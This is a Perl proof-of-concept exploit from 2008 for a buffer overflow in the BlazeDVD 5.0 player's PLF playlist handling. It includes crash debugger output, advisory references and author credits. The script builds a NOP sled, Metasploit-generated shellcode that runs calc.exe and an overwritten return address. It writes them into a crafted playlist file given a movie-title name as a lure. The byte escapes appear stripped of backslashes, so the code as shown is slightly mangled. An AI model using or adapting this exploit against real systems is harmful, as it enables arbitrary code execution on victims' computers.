BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

#

# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)

#

# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.

# It can provide superior video and audio(Dolby) quality, together with other

# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image

# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,

# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file

# you have the codec installed for.The DVD player software can be extensive

# compatible with hardware,which is operated stable,smoothly under Windows98,

# 98SE, Me, 2000, XP, VISTA.

#

# Product web Page: http://www.blazevideo.com/dvd-player/index.htm

#

# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be

# exploited via crafted PLF playlist file localy and remotely. It fails to

# perform boundry checking of the user input file, allowing the EIP to be

# overwritten, thus, controling the next insctruction of the software. After

# succesfull exploitation, calc.exe will be executed. Failed attempts will

# result in Denial Of Service (DoS).

#

# WinDgb(output):

#

# - (4d8.f80): Access violation - code c0000005 (first chance)

# - First chance exceptions are reported before any exception handling.

# - This exception may be expected and handled.

# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c

# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc

# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216

# - 41414141 ?? ???

#

#

# Tested on Microsoft Windows XP SP2 (English)

#

# Vulnerability discovered by: Parvez Anwar and Greg Linares

#

# Refs:

#

# - http://secunia.com/advisories/23041/

# - http://www.frsirt.com/english/advisories/2006/4764

# - http://xforce.iss.net/xforce/xfdb/30567

# - http://osvdb.org/30770

# - http://www.securityfocus.com/bid/21337/

# - http://www.milw0rm.com/exploits/2880

#

# Exploit coded by Gjoko 'LiquidWorm' Krstic

#

# liquidworm@gmail.com

#

# http://www.zeroscience.org

#

# 08.08.2008

# print "n|==================================================================|n";

print "| |n";

print "| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |n";

print "| by LiquidWorm |n";

print "| |n";

print "|==================================================================|nn"; $nop = "x90" x 96;

# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com $shellcode = "x29xc9x83xe9xddxd9xee".

"xd9x74x24xf4x5bx81x73".

"x13x7dxe6xe7x4ex83xeb".

"xfcxe2xf4x81x0exa3x4e".

"x7dxe6x6cx0bx41x6dx9b".

"x4bx05xe7x08xc5x32xfe".

"x6cx11x5dxe7x0cx07xf6".

"xd2x6cx4fx93xd7x27xd7".

"xd1x62x27x3ax7ax27x2d".

"x43x7cx24x0cxbax46xb2".

"xc3x4ax08x03x6cx11x59".

"xe7x0cx28xf6xeaxacxc5".

"x22xfaxe6xa5xf6xfax6c".

"x4fx96x6fxbbx6ax79x25".

"xd6x8ex19x6dxa7x7exf8".

"x26x9fx42xf6xa6xebxc5".

"x0dxfax4axc5x15xeex0c".

"x47xf6x66x57x4ex7dxe6".

"x6cx26x41xb9xd6xb8x1d".

"xb0x6exb6xfex26x9cx1e".

"x15x16x6dx4ax22x8ex7f".

"xb0xf7xe8xb0xb1x9ax85".

"x86x22x1exc8x82x36x18".

"xe6xe7x4e";

$ret = "x78x53xbex01"; $payload = $nop.$shellcode.$ret; open(plf, ">./The_Dark_Knight.plf"); print plf "$payload"; print "n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!nn"; print "n...t00t w00t!nan";

# August, 2008